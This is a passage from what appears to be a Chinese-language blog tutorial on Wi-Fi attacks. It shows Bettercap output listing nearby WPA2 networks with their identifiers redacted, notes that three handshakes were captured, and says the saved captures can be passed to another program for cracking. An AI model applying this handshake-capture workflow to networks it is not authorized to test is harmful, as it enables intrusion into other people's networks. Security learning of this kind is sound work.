| -94 dBm | ██:██:██:██:██:██ | ██████████████████████████    | WPA2 (CCMP, PSK) | 2.0 | 6  |         |        |        | 23:04:39 |
| -95 dBm | ██:██:██:██:██:██ | █████████████████             | WPA2 (CCMP, PSK) |     | 11 |         |        |        | 23:04:39 |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+

wlan1mon (ch. 12) / ↑ 45 kB / ↓ 8.9 MB / 38377 pkts / 3 handshakes

通过运行这两个模块,我们能够获取十个最接近的Wi-Fi网络中的五个所需的信息。真是令人印象深刻。如果打开从这些捕获生成的文件Bettercap,则可以看到Bettercap保存的信息,以供我们破解另一个程序。

admin
我还没有学会写个人说明!
查看“admin”的所有文章 →

发表评论

电子邮件地址不会被公开。 必填项已用*标注

相关推荐